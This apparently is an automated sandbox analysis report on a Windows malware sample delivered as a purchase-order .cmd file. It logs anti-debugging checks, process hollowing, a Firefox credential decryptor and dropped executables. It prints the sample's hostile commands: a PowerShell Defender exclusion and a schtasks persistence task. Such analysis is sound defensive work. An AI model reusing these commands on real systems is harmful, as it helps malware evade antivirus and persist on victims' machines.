Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B3EBE8 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_02B3EBE8

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Code function: 10_2_0283C168 LdrInitializeThunk,LdrInitializeThunk,

10_2_0283C168

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Code function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

8_2_0040CE09

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

8_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B38798 LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B38798

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Code function: 8_2_0040ADB0 GetProcessHeap,HeapFree,

8_2_0040ADB0

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_2_004123F1 SetUnhandledExceptionFilter,	8_2_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_1_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_1_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_1_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 8_1_004123F1 SetUnhandledExceptionFilter,	8_1_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_2_004123F1 SetUnhandledExceptionFilter,	21_2_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_1_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_1_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_1_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 21_1_004123F1 SetUnhandledExceptionFilter,	21_1_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_2_004123F1 SetUnhandledExceptionFilter,	26_2_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_1_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_1_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_1_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 26_1_004123F1 SetUnhandledExceptionFilter,	26_1_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_2_004123F1 SetUnhandledExceptionFilter,	31_2_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_1_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_1_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_1_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 31_1_004123F1 SetUnhandledExceptionFilter,	31_1_004123F1

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Microsofts.exe.8.dr, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: Microsofts.exe.8.dr, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: Microsofts.exe.8.dr, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 26A008	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 291008
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 28E008
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 26A008

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02B25A78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02B2A790
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02B2A744
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02B25B84
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	8_2_00417A20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	8_1_00417A20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	21_2_00417A20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	21_1_00417A20
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	22_2_02BC5A78
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: GetLocaleInfoA,	22_2_02BCA790
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	22_2_02BC5B83
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	26_2_00417A20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	26_1_00417A20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	31_2_00417A20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: GetLocaleInfoA,	31_1_00417A20

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B2918C GetLocalTime,

4_2_02B2918C

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B2B70C GetVersionExA,

4_2_02B2B70C

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

